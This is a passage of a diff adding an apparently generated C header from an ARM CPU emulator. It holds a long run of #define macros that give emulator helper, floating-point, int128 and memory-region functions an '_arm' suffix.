helper_le_ldq_mmu_arm +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_arm +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_arm +#define helper_le_ldul_mmu helper_le_ldul_mmu_arm +#define helper_le_lduw_mmu helper_le_lduw_mmu_arm +#define helper_le_ldw_cmmu helper_le_ldw_cmmu_arm +#define helper_le_stl_mmu helper_le_stl_mmu_arm +#define helper_le_stq_mmu helper_le_stq_mmu_arm +#define helper_le_stw_mmu helper_le_stw_mmu_arm +#define helper_msr_i_pstate helper_msr_i_pstate_arm +#define helper_neon_abd_f32 helper_neon_abd_f32_arm +#define helper_neon_abdl_s16 helper_neon_abdl_s16_arm +#define helper_neon_abdl_s32 helper_neon_abdl_s32_arm +#define helper_neon_abdl_s64 helper_neon_abdl_s64_arm +#define helper_neon_abdl_u16 helper_neon_abdl_u16_arm +#define helper_neon_abdl_u32 helper_neon_abdl_u32_arm +#define helper_neon_abdl_u64 helper_neon_abdl_u64_arm +#define helper_neon_abd_s16 helper_neon_abd_s16_arm +#define helper_neon_abd_s32 helper_neon_abd_s32_arm +#define helper_neon_abd_s8 helper_neon_abd_s8_arm +#define helper_neon_abd_u16 helper_neon_abd_u16_arm +#define helper_neon_abd_u32 helper_neon_abd_u32_arm +#define helper_neon_abd_u8 helper_neon_abd_u8_arm +#define helper_neon_abs_s16 helper_neon_abs_s16_arm +#define helper_neon_abs_s8 helper_neon_abs_s8_arm +#define helper_neon_acge_f32 helper_neon_acge_f32_arm +#define helper_neon_acge_f64 helper_neon_acge_f64_arm +#define helper_neon_acgt_f32 helper_neon_acgt_f32_arm +#define helper_neon_acgt_f64 helper_neon_acgt_f64_arm +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_arm +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_arm +#define helper_neon_addl_u16 helper_neon_addl_u16_arm +#define helper_neon_addl_u32 helper_neon_addl_u32_arm +#define helper_neon_add_u16 helper_neon_add_u16_arm +#define helper_neon_add_u8 helper_neon_add_u8_arm +#define helper_neon_ceq_f32 helper_neon_ceq_f32_arm +#define helper_neon_ceq_u16 helper_neon_ceq_u16_arm +#define helper_neon_ceq_u32 
helper_neon_ceq_u32_arm +#define helper_neon_ceq_u8 helper_neon_ceq_u8_arm +#define helper_neon_cge_f32 helper_neon_cge_f32_arm +#define helper_neon_cge_s16 helper_neon_cge_s16_arm +#define helper_neon_cge_s32 helper_neon_cge_s32_arm +#define helper_neon_cge_s8 helper_neon_cge_s8_arm +#define helper_neon_cge_u16 helper_neon_cge_u16_arm +#define helper_neon_cge_u32 helper_neon_cge_u32_arm +#define helper_neon_cge_u8 helper_neon_cge_u8_arm +#define helper_neon_cgt_f32 helper_neon_cgt_f32_arm +#define helper_neon_cgt_s16 helper_neon_cgt_s16_arm +#define helper_neon_cgt_s32 helper_neon_cgt_s32_arm +#define helper_neon_cgt_s8 helper_neon_cgt_s8_arm +#define helper_neon_cgt_u16 helper_neon_cgt_u16_arm +#define helper_neon_cgt_u32 helper_neon_cgt_u32_arm +#define helper_neon_cgt_u8 helper_neon_cgt_u8_arm +#define helper_neon_cls_s16 helper_neon_cls_s16_arm +#define helper_neon_cls_s32 helper_neon_cls_s32_arm +#define helper_neon_cls_s8 helper_neon_cls_s8_arm +#define helper_neon_clz_u16 helper_neon_clz_u16_arm +#define helper_neon_clz_u8 helper_neon_clz_u8_arm +#define helper_neon_cnt_u8 helper_neon_cnt_u8_arm +#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_arm +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_arm +#define helper_neon_hadd_s16 helper_neon_hadd_s16_arm +#define helper_neon_hadd_s32 helper_neon_hadd_s32_arm +#define helper_neon_hadd_s8 helper_neon_hadd_s8_arm +#define helper_neon_hadd_u16 helper_neon_hadd_u16_arm +#define helper_neon_hadd_u32 helper_neon_hadd_u32_arm +#define helper_neon_hadd_u8 helper_neon_hadd_u8_arm +#define helper_neon_hsub_s16 helper_neon_hsub_s16_arm +#define helper_neon_hsub_s32 helper_neon_hsub_s32_arm +#define helper_neon_hsub_s8 helper_neon_hsub_s8_arm +#define helper_neon_hsub_u16 helper_neon_hsub_u16_arm +#define helper_neon_hsub_u32 helper_neon_hsub_u32_arm +#define helper_neon_hsub_u8 helper_neon_hsub_u8_arm +#define helper_neon_max_s16 helper_neon_max_s16_arm +#define helper_neon_max_s32 
helper_neon_max_s32_arm +#define helper_neon_max_s8 helper_neon_max_s8_arm +#define helper_neon_max_u16 helper_neon_max_u16_arm +#define helper_neon_max_u32 helper_neon_max_u32_arm +#define helper_neon_max_u8 helper_neon_max_u8_arm +#define helper_neon_min_s16 helper_neon_min_s16_arm +#define helper_neon_min_s32 helper_neon_min_s32_arm +#define helper_neon_min_s8 helper_neon_min_s8_arm +#define helper_neon_min_u16 helper_neon_min_u16_arm +#define helper_neon_min_u32 helper_neon_min_u32_arm +#define helper_neon_min_u8 helper_neon_min_u8_arm +#define helper_neon_mull_p8 helper_neon_mull_p8_arm +#define helper_neon_mull_s16 helper_neon_mull_s16_arm +#define helper_neon_mull_s8 helper_neon_mull_s8_arm +#define helper_neon_mull_u16 helper_neon_mull_u16_arm +#define helper_neon_mull_u8 helper_neon_mull_u8_arm +#define helper_neon_mul_p8 helper_neon_mul_p8_arm +#define helper_neon_mul_u16 helper_neon_mul_u16_arm +#define helper_neon_mul_u8 helper_neon_mul_u8_arm +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_arm +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_arm +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_arm +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_arm +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_arm +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_arm +#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_arm +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_arm +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_arm +#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_arm +#define helper_neon_narrow_u16 helper_neon_narrow_u16_arm +#define helper_neon_narrow_u8 helper_neon_narrow_u8_arm +#define helper_neon_negl_u16 helper_neon_negl_u16_arm +#define helper_neon_negl_u32 helper_neon_negl_u32_arm +#define helper_neon_paddl_u16 helper_neon_paddl_u16_arm +#define helper_neon_paddl_u32 
helper_neon_paddl_u32_arm +#define helper_neon_padd_u16 helper_neon_padd_u16_arm +#define helper_neon_padd_u8 helper_neon_padd_u8_arm +#define helper_neon_pmax_s16 helper_neon_pmax_s16_arm +#define helper_neon_pmax_s8 helper_neon_pmax_s8_arm +#define helper_neon_pmax_u16 helper_neon_pmax_u16_arm +#define helper_neon_pmax_u8 helper_neon_pmax_u8_arm +#define helper_neon_pmin_s16 helper_neon_pmin_s16_arm +#define helper_neon_pmin_s8 helper_neon_pmin_s8_arm +#define helper_neon_pmin_u16 helper_neon_pmin_u16_arm +#define helper_neon_pmin_u8 helper_neon_pmin_u8_arm +#define helper_neon_pmull_64_hi helper_neon_pmull_64_hi_arm +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_arm +#define helper_neon_qabs_s16 helper_neon_qabs_s16_arm +#define helper_neon_qabs_s32 helper_neon_qabs_s32_arm +#define helper_neon_qabs_s64 helper_neon_qabs_s64_arm +#define helper_neon_qabs_s8 helper_neon_qabs_s8_arm +#define helper_neon_qadd_s16 helper_neon_qadd_s16_arm +#define helper_neon_qadd_s32 helper_neon_qadd_s32_arm +#define helper_neon_qadd_s64 helper_neon_qadd_s64_arm +#define helper_neon_qadd_s8 helper_neon_qadd_s8_arm +#define helper_neon_qadd_u16 helper_neon_qadd_u16_arm +#define helper_neon_qadd_u32 helper_neon_qadd_u32_arm +#define helper_neon_qadd_u64 helper_neon_qadd_u64_arm +#define helper_neon_qadd_u8 helper_neon_qadd_u8_arm +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_arm +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_arm +#define helper_neon_qneg_s16 helper_neon_qneg_s16_arm +#define helper_neon_qneg_s32 helper_neon_qneg_s32_arm +#define helper_neon_qneg_s64 helper_neon_qneg_s64_arm +#define helper_neon_qneg_s8 helper_neon_qneg_s8_arm +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_arm +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_arm +#define helper_neon_qrshl_s16 helper_neon_qrshl_s16_arm +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_arm +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_arm +#define 
helper_neon_qrshl_s8 helper_neon_qrshl_s8_arm +#define helper_neon_qrshl_u16 helper_neon_qrshl_u16_arm +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_arm +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_arm +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_arm +#define helper_neon_qshl_s16 helper_neon_qshl_s16_arm +#define helper_neon_qshl_s32 helper_neon_qshl_s32_arm +#define helper_neon_qshl_s64 helper_neon_qshl_s64_arm +#define helper_neon_qshl_s8 helper_neon_qshl_s8_arm +#define helper_neon_qshl_u16 helper_neon_qshl_u16_arm +#define helper_neon_qshl_u32 helper_neon_qshl_u32_arm +#define helper_neon_qshl_u64 helper_neon_qshl_u64_arm +#define helper_neon_qshl_u8 helper_neon_qshl_u8_arm +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_arm +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_arm +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_arm +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_arm +#define helper_neon_qsub_s16 helper_neon_qsub_s16_arm +#define helper_neon_qsub_s32 helper_neon_qsub_s32_arm +#define helper_neon_qsub_s64 helper_neon_qsub_s64_arm +#define helper_neon_qsub_s8 helper_neon_qsub_s8_arm +#define helper_neon_qsub_u16 helper_neon_qsub_u16_arm +#define helper_neon_qsub_u32 helper_neon_qsub_u32_arm +#define helper_neon_qsub_u64 helper_neon_qsub_u64_arm +#define helper_neon_qsub_u8 helper_neon_qsub_u8_arm +#define helper_neon_qunzip16 helper_neon_qunzip16_arm +#define helper_neon_qunzip32 helper_neon_qunzip32_arm +#define helper_neon_qunzip8 helper_neon_qunzip8_arm +#define helper_neon_qzip16 helper_neon_qzip16_arm +#define helper_neon_qzip32 helper_neon_qzip32_arm +#define helper_neon_qzip8 helper_neon_qzip8_arm +#define helper_neon_rbit_u8 helper_neon_rbit_u8_arm +#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_arm +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_arm +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_arm +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_arm +#define helper_neon_rhadd_u32 
helper_neon_rhadd_u32_arm +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_arm +#define helper_neon_rshl_s16 helper_neon_rshl_s16_arm +#define helper_neon_rshl_s32 helper_neon_rshl_s32_arm +#define helper_neon_rshl_s64 helper_neon_rshl_s64_arm +#define helper_neon_rshl_s8 helper_neon_rshl_s8_arm +#define helper_neon_rshl_u16 helper_neon_rshl_u16_arm +#define helper_neon_rshl_u32 helper_neon_rshl_u32_arm +#define helper_neon_rshl_u64 helper_neon_rshl_u64_arm +#define helper_neon_rshl_u8 helper_neon_rshl_u8_arm +#define helper_neon_shl_s16 helper_neon_shl_s16_arm +#define helper_neon_shl_s32 helper_neon_shl_s32_arm +#define helper_neon_shl_s64 helper_neon_shl_s64_arm +#define helper_neon_shl_s8 helper_neon_shl_s8_arm +#define helper_neon_shl_u16 helper_neon_shl_u16_arm +#define helper_neon_shl_u32 helper_neon_shl_u32_arm +#define helper_neon_shl_u64 helper_neon_shl_u64_arm +#define helper_neon_shl_u8 helper_neon_shl_u8_arm +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_arm +#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_arm +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_arm +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_arm +#define helper_neon_subl_u16 helper_neon_subl_u16_arm +#define helper_neon_subl_u32 helper_neon_subl_u32_arm +#define helper_neon_sub_u16 helper_neon_sub_u16_arm +#define helper_neon_sub_u8 helper_neon_sub_u8_arm +#define helper_neon_tbl helper_neon_tbl_arm +#define helper_neon_tst_u16 helper_neon_tst_u16_arm +#define helper_neon_tst_u32 helper_neon_tst_u32_arm +#define helper_neon_tst_u8 helper_neon_tst_u8_arm +#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_arm +#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_arm +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_arm +#define helper_neon_unzip16 helper_neon_unzip16_arm +#define helper_neon_unzip8 helper_neon_unzip8_arm +#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_arm +#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_arm +#define 
helper_neon_uqadd_s64 helper_neon_uqadd_s64_arm +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_arm +#define helper_neon_widen_s16 helper_neon_widen_s16_arm +#define helper_neon_widen_s8 helper_neon_widen_s8_arm +#define helper_neon_widen_u16 helper_neon_widen_u16_arm +#define helper_neon_widen_u8 helper_neon_widen_u8_arm +#define helper_neon_zip16 helper_neon_zip16_arm +#define helper_neon_zip8 helper_neon_zip8_arm +#define helper_pre_hvc helper_pre_hvc_arm +#define helper_pre_smc helper_pre_smc_arm +#define helper_qadd16 helper_qadd16_arm +#define helper_qadd8 helper_qadd8_arm +#define helper_qaddsubx helper_qaddsubx_arm +#define helper_qsub16 helper_qsub16_arm +#define helper_qsub8 helper_qsub8_arm +#define helper_qsubaddx helper_qsubaddx_arm +#define helper_rbit helper_rbit_arm +#define helper_recpe_f32 helper_recpe_f32_arm +#define helper_recpe_f64 helper_recpe_f64_arm +#define helper_recpe_u32 helper_recpe_u32_arm +#define helper_recps_f32 helper_recps_f32_arm +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_arm +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_arm +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_arm +#define helper_ret_stb_mmu helper_ret_stb_mmu_arm +#define helper_rintd helper_rintd_arm +#define helper_rintd_exact helper_rintd_exact_arm +#define helper_rints helper_rints_arm +#define helper_rints_exact helper_rints_exact_arm +#define helper_ror_cc helper_ror_cc_arm +#define helper_rsqrte_f32 helper_rsqrte_f32_arm +#define helper_rsqrte_f64 helper_rsqrte_f64_arm +#define helper_rsqrte_u32 helper_rsqrte_u32_arm +#define helper_rsqrts_f32 helper_rsqrts_f32_arm +#define helper_sadd16 helper_sadd16_arm +#define helper_sadd8 helper_sadd8_arm +#define helper_saddsubx helper_saddsubx_arm +#define helper_sar_cc helper_sar_cc_arm +#define helper_sdiv helper_sdiv_arm +#define helper_sel_flags helper_sel_flags_arm +#define helper_set_cp_reg helper_set_cp_reg_arm +#define helper_set_cp_reg64 helper_set_cp_reg64_arm +#define helper_set_neon_rmode 
helper_set_neon_rmode_arm +#define helper_set_r13_banked helper_set_r13_banked_arm +#define helper_set_rmode helper_set_rmode_arm +#define helper_set_user_reg helper_set_user_reg_arm +#define helper_shadd16 helper_shadd16_arm +#define helper_shadd8 helper_shadd8_arm +#define helper_shaddsubx helper_shaddsubx_arm +#define helper_shl_cc helper_shl_cc_arm +#define helper_shr_cc helper_shr_cc_arm +#define helper_shsub16 helper_shsub16_arm +#define helper_shsub8 helper_shsub8_arm +#define helper_shsubaddx helper_shsubaddx_arm +#define helper_ssat helper_ssat_arm +#define helper_ssat16 helper_ssat16_arm +#define helper_ssub16 helper_ssub16_arm +#define helper_ssub8 helper_ssub8_arm +#define helper_ssubaddx helper_ssubaddx_arm +#define helper_stb_mmu helper_stb_mmu_arm +#define helper_stl_mmu helper_stl_mmu_arm +#define helper_stq_mmu helper_stq_mmu_arm +#define helper_stw_mmu helper_stw_mmu_arm +#define helper_sub_saturate helper_sub_saturate_arm +#define helper_sub_usaturate helper_sub_usaturate_arm +#define helper_sxtb16 helper_sxtb16_arm +#define helper_uadd16 helper_uadd16_arm +#define helper_uadd8 helper_uadd8_arm +#define helper_uaddsubx helper_uaddsubx_arm +#define helper_udiv helper_udiv_arm +#define helper_uhadd16 helper_uhadd16_arm +#define helper_uhadd8 helper_uhadd8_arm +#define helper_uhaddsubx helper_uhaddsubx_arm +#define helper_uhsub16 helper_uhsub16_arm +#define helper_uhsub8 helper_uhsub8_arm +#define helper_uhsubaddx helper_uhsubaddx_arm +#define helper_uqadd16 helper_uqadd16_arm +#define helper_uqadd8 helper_uqadd8_arm +#define helper_uqaddsubx helper_uqaddsubx_arm +#define helper_uqsub16 helper_uqsub16_arm +#define helper_uqsub8 helper_uqsub8_arm +#define helper_uqsubaddx helper_uqsubaddx_arm +#define helper_usad8 helper_usad8_arm +#define helper_usat helper_usat_arm +#define helper_usat16 helper_usat16_arm +#define helper_usub16 helper_usub16_arm +#define helper_usub8 helper_usub8_arm +#define helper_usubaddx helper_usubaddx_arm +#define 
helper_uxtb16 helper_uxtb16_arm +#define helper_v7m_mrs helper_v7m_mrs_arm +#define helper_v7m_msr helper_v7m_msr_arm +#define helper_vfp_absd helper_vfp_absd_arm +#define helper_vfp_abss helper_vfp_abss_arm +#define helper_vfp_addd helper_vfp_addd_arm +#define helper_vfp_adds helper_vfp_adds_arm +#define helper_vfp_cmpd helper_vfp_cmpd_arm +#define helper_vfp_cmped helper_vfp_cmped_arm +#define helper_vfp_cmpes helper_vfp_cmpes_arm +#define helper_vfp_cmps helper_vfp_cmps_arm +#define helper_vfp_divd helper_vfp_divd_arm +#define helper_vfp_divs helper_vfp_divs_arm +#define helper_vfp_fcvtds helper_vfp_fcvtds_arm +#define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_arm +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_arm +#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_arm +#define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_arm +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_arm +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_arm +#define helper_vfp_maxd helper_vfp_maxd_arm +#define helper_vfp_maxnumd helper_vfp_maxnumd_arm +#define helper_vfp_maxnums helper_vfp_maxnums_arm +#define helper_vfp_maxs helper_vfp_maxs_arm +#define helper_vfp_mind helper_vfp_mind_arm +#define helper_vfp_minnumd helper_vfp_minnumd_arm +#define helper_vfp_minnums helper_vfp_minnums_arm +#define helper_vfp_mins helper_vfp_mins_arm +#define helper_vfp_muladdd helper_vfp_muladdd_arm +#define helper_vfp_muladds helper_vfp_muladds_arm +#define helper_vfp_muld helper_vfp_muld_arm +#define helper_vfp_muls helper_vfp_muls_arm +#define helper_vfp_negd helper_vfp_negd_arm +#define helper_vfp_negs helper_vfp_negs_arm +#define helper_vfp_set_fpscr helper_vfp_set_fpscr_arm +#define helper_vfp_shtod helper_vfp_shtod_arm +#define helper_vfp_shtos helper_vfp_shtos_arm +#define helper_vfp_sitod helper_vfp_sitod_arm +#define helper_vfp_sitos helper_vfp_sitos_arm +#define helper_vfp_sltod helper_vfp_sltod_arm +#define helper_vfp_sltos helper_vfp_sltos_arm 
+#define helper_vfp_sqrtd helper_vfp_sqrtd_arm +#define helper_vfp_sqrts helper_vfp_sqrts_arm +#define helper_vfp_sqtod helper_vfp_sqtod_arm +#define helper_vfp_sqtos helper_vfp_sqtos_arm +#define helper_vfp_subd helper_vfp_subd_arm +#define helper_vfp_subs helper_vfp_subs_arm +#define helper_vfp_toshd helper_vfp_toshd_arm +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_arm +#define helper_vfp_toshs helper_vfp_toshs_arm +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_arm +#define helper_vfp_tosid helper_vfp_tosid_arm +#define helper_vfp_tosis helper_vfp_tosis_arm +#define helper_vfp_tosizd helper_vfp_tosizd_arm +#define helper_vfp_tosizs helper_vfp_tosizs_arm +#define helper_vfp_tosld helper_vfp_tosld_arm +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_arm +#define helper_vfp_tosls helper_vfp_tosls_arm +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_arm +#define helper_vfp_tosqd helper_vfp_tosqd_arm +#define helper_vfp_tosqs helper_vfp_tosqs_arm +#define helper_vfp_touhd helper_vfp_touhd_arm +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_arm +#define helper_vfp_touhs helper_vfp_touhs_arm +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_arm +#define helper_vfp_touid helper_vfp_touid_arm +#define helper_vfp_touis helper_vfp_touis_arm +#define helper_vfp_touizd helper_vfp_touizd_arm +#define helper_vfp_touizs helper_vfp_touizs_arm +#define helper_vfp_tould helper_vfp_tould_arm +#define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_arm +#define helper_vfp_touls helper_vfp_touls_arm +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_arm +#define helper_vfp_touqd helper_vfp_touqd_arm +#define helper_vfp_touqs helper_vfp_touqs_arm +#define helper_vfp_uhtod helper_vfp_uhtod_arm +#define helper_vfp_uhtos helper_vfp_uhtos_arm +#define helper_vfp_uitod helper_vfp_uitod_arm +#define helper_vfp_uitos 
helper_vfp_uitos_arm +#define helper_vfp_ultod helper_vfp_ultod_arm +#define helper_vfp_ultos helper_vfp_ultos_arm +#define helper_vfp_uqtod helper_vfp_uqtod_arm +#define helper_vfp_uqtos helper_vfp_uqtos_arm +#define helper_wfe helper_wfe_arm +#define helper_wfi helper_wfi_arm +#define hex2decimal hex2decimal_arm +#define hw_breakpoint_update hw_breakpoint_update_arm +#define hw_breakpoint_update_all hw_breakpoint_update_all_arm +#define hw_watchpoint_update hw_watchpoint_update_arm +#define hw_watchpoint_update_all hw_watchpoint_update_all_arm +#define _init _init_arm +#define init_cpreg_list init_cpreg_list_arm +#define init_lists init_lists_arm +#define input_type_enum input_type_enum_arm +#define int128_2_64 int128_2_64_arm +#define int128_add int128_add_arm +#define int128_addto int128_addto_arm +#define int128_and int128_and_arm +#define int128_eq int128_eq_arm +#define int128_ge int128_ge_arm +#define int128_get64 int128_get64_arm +#define int128_gt int128_gt_arm +#define int128_le int128_le_arm +#define int128_lt int128_lt_arm +#define int128_make64 int128_make64_arm +#define int128_max int128_max_arm +#define int128_min int128_min_arm +#define int128_ne int128_ne_arm +#define int128_neg int128_neg_arm +#define int128_nz int128_nz_arm +#define int128_rshift int128_rshift_arm +#define int128_sub int128_sub_arm +#define int128_subfrom int128_subfrom_arm +#define int128_zero int128_zero_arm +#define int16_to_float32 int16_to_float32_arm +#define int16_to_float64 int16_to_float64_arm +#define int32_to_float128 int32_to_float128_arm +#define int32_to_float32 int32_to_float32_arm +#define int32_to_float64 int32_to_float64_arm +#define int32_to_floatx80 int32_to_floatx80_arm +#define int64_to_float128 int64_to_float128_arm +#define int64_to_float32 int64_to_float32_arm +#define int64_to_float64 int64_to_float64_arm +#define int64_to_floatx80 int64_to_floatx80_arm +#define invalidate_and_set_dirty invalidate_and_set_dirty_arm +#define invalidate_page_bitmap 
invalidate_page_bitmap_arm +#define io_mem_read io_mem_read_arm +#define io_mem_write io_mem_write_arm +#define io_readb io_readb_arm +#define io_readl io_readl_arm +#define io_readq io_readq_arm +#define io_readw io_readw_arm +#define iotlb_to_region iotlb_to_region_arm +#define io_writeb io_writeb_arm +#define io_writel io_writel_arm +#define io_writeq io_writeq_arm +#define io_writew io_writew_arm +#define is_a64 is_a64_arm +#define is_help_option is_help_option_arm +#define isr_read isr_read_arm +#define is_valid_option_list is_valid_option_list_arm +#define iwmmxt_load_creg iwmmxt_load_creg_arm +#define iwmmxt_load_reg iwmmxt_load_reg_arm +#define iwmmxt_store_creg iwmmxt_store_creg_arm +#define iwmmxt_store_reg iwmmxt_store_reg_arm +#define __jit_debug_descriptor __jit_debug_descriptor_arm +#define __jit_debug_register_code __jit_debug_register_code_arm +#define kvm_to_cpreg_id kvm_to_cpreg_id_arm +#define last_ram_offset last_ram_offset_arm +#define ldl_be_p ldl_be_p_arm +#define ldl_be_phys ldl_be_phys_arm +#define ldl_he_p ldl_he_p_arm +#define ldl_le_p ldl_le_p_arm +#define ldl_le_phys ldl_le_phys_arm +#define ldl_phys ldl_phys_arm +#define ldl_phys_internal ldl_phys_internal_arm +#define ldq_be_p ldq_be_p_arm +#define ldq_be_phys ldq_be_phys_arm +#define ldq_he_p ldq_he_p_arm +#define ldq_le_p ldq_le_p_arm +#define ldq_le_phys ldq_le_phys_arm +#define ldq_phys ldq_phys_arm +#define ldq_phys_internal ldq_phys_internal_arm +#define ldst_name ldst_name_arm +#define ldub_p ldub_p_arm +#define ldub_phys ldub_phys_arm +#define lduw_be_p lduw_be_p_arm +#define lduw_be_phys lduw_be_phys_arm +#define lduw_he_p lduw_he_p_arm +#define lduw_le_p lduw_le_p_arm +#define lduw_le_phys lduw_le_phys_arm +#define lduw_phys lduw_phys_arm +#define lduw_phys_internal lduw_phys_internal_arm +#define le128 le128_arm +#define linked_bp_matches linked_bp_matches_arm +#define listener_add_address_space listener_add_address_space_arm +#define load_cpu_offset load_cpu_offset_arm 
+#define load_reg load_reg_arm +#define load_reg_var load_reg_var_arm +#define log_cpu_state log_cpu_state_arm +#define lpae_cp_reginfo lpae_cp_reginfo_arm +#define lt128 lt128_arm +#define machine_class_init machine_class_init_arm +#define machine_finalize machine_finalize_arm +#define machine_info machine_info_arm +#define machine_initfn machine_initfn_arm +#define machine_register_types machine_register_types_arm +#define machvirt_init machvirt_init_arm +#define machvirt_machine_init machvirt_machine_init_arm +#define maj maj_arm +#define mapping_conflict mapping_conflict_arm +#define mapping_contiguous mapping_contiguous_arm +#define mapping_have_same_region mapping_have_same_region_arm +#define mapping_merge mapping_merge_arm +#define mem_add mem_add_arm +#define mem_begin mem_begin_arm +#define mem_commit mem_commit_arm +#define memory_access_is_direct memory_access_is_direct_arm +#define memory_access_size memory_access_size_arm +#define memory_init memory_init_arm +#define memory_listener_match memory_listener_match_arm +#define memory_listener_register memory_listener_register_arm +#define memory_listener_unregister memory_listener_unregister_arm +#define memory_map_init memory_map_init_arm +#define memory_mapping_filter memory_mapping_filter_arm +#define memory_mapping_list_add_mapping_sorted memory_mapping_list_add_mapping_sorted_arm +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_arm +#define memory_mapping_list_free memory_mapping_list_free_arm +#define memory_mapping_list_init memory_mapping_list_init_arm +#define memory_region_access_valid memory_region_access_valid_arm +#define memory_region_add_subregion memory_region_add_subregion_arm +#define memory_region_add_subregion_common memory_region_add_subregion_common_arm +#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_arm +#define memory_region_big_endian memory_region_big_endian_arm +#define memory_region_clear_pending 
memory_region_clear_pending_arm +#define memory_region_del_subregion memory_region_del_subregion_arm +#define memory_region_destructor_alias memory_region_destructor_alias_arm +#define memory_region_destructor_none memory_region_destructor_none_arm +#define memory_region_destructor_ram memory_region_destructor_ram_arm +#define memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_arm +#define memory_region_dispatch_read memory_region_dispatch_read_arm +#define memory_region_dispatch_read1 memory_region_dispatch_read1_arm +#define memory_region_dispatch_write memory_region_dispatch_write_arm +#define memory_region_escape_name memory_region_escape_name_arm +#define memory_region_finalize memory_region_finalize_arm +#define memory_region_find memory_region_find_arm +#define memory_region_get_addr memory_region_get_addr_arm +#define memory_region_get_alignment memory_region_get_alignment_arm +#define memory_region_get_container memory_region_get_container_arm +#define memory_region_get_fd memory_region_get_fd_arm +#define memory_region_get_may_overlap memory_region_get_may_overlap_arm +#define memory_region_get_priority memory_region_get_priority_arm +#define memory_region_get_ram_addr memory_region_get_ram_addr_arm +#define memory_region_get_ram_ptr memory_region_get_ram_ptr_arm +#define memory_region_get_size memory_region_get_size_arm +#define memory_region_info memory_region_info_arm +#define memory_region_init memory_region_init_arm +#define memory_region_init_alias memory_region_init_alias_arm +#define memory_region_initfn memory_region_initfn_arm +#define memory_region_init_io memory_region_init_io_arm +#define memory_region_init_ram memory_region_init_ram_arm +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_arm +#define memory_region_init_reservation memory_region_init_reservation_arm +#define memory_region_is_iommu memory_region_is_iommu_arm +#define memory_region_is_logging memory_region_is_logging_arm +#define 
memory_region_is_mapped memory_region_is_mapped_arm +#define memory_region_is_ram memory_region_is_ram_arm +#define memory_region_is_rom memory_region_is_rom_arm +#define memory_region_is_romd memory_region_is_romd_arm +#define memory_region_is_skip_dump memory_region_is_skip_dump_arm +#define memory_region_is_unassigned memory_region_is_unassigned_arm +#define memory_region_name memory_region_name_arm +#define memory_region_need_escape memory_region_need_escape_arm +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_arm +#define memory_region_oldmmio_write_accessor memory_region_oldmmio_write_accessor_arm +#define memory_region_present memory_region_present_arm +#define memory_region_read_accessor memory_region_read_accessor_arm +#define memory_region_readd_subregion memory_region_readd_subregion_arm +#define memory_region_ref memory_region_ref_arm +#define memory_region_resolve_container 